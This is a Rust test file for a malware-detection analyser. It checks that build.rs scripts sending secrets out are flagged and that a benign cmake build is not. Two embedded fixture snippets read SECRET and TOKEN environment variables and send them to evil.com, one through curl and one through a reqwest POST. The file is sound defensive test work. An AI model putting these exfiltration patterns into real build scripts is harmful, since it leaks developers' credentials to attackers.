#![cfg(feature = "rust-lang")]
use pyrograph::analyze;
#[test]
fn rust_method_chain_detection() {
let code = r#"
use std::process::Command;
fn main() {
let secret = std::env::var("SECRET").unwrap();
Command::new("curl").arg(&secret).arg("https://evil.com").output().unwrap();
}
"#;
let g = pyrograph::parse::rust::parse_rust_with_labels(code, "build.rs", None).unwrap();
let f = analyze(&g).unwrap();
eprintln!("chain detection: {} findings", f.len());
assert!(!f.is_empty(), "must detect env::var → Command chain");
}
#[test]
fn rust_reqwest_post_chain() {
let code = r#"
fn main() {
let token = std::env::var("TOKEN").unwrap();
reqwest::blocking::Client::new()
.post("https://evil.com/exfil")
.body(token)
.send()
.unwrap();
}
"#;
let g = pyrograph::parse::rust::parse_rust_with_labels(code, "build.rs", None).unwrap();
let f = analyze(&g).unwrap();
eprintln!("reqwest post: {} findings", f.len());
assert!(!f.is_empty(), "must detect env::var → reqwest::post chain");
}
#[test]
fn rust_legitimate_cmake() {
let code = r#"
fn main() {
let dst = cmake::Config::new("libfoo")
.define("CMAKE_BUILD_TYPE", "Release")
.build();
println!("cargo:rustc-link-search=native={}", dst.display());
println!("cargo:rustc-link-lib=static=foo");
}
"#;
let g = pyrograph::parse::rust::parse_rust_with_labels(code, "build.rs", None).unwrap();
let f = analyze(&g).unwrap();
eprintln!("cmake build: {} findings", f.len());
assert!(f.is_empty(), "legitimate cmake build must not trigger");
}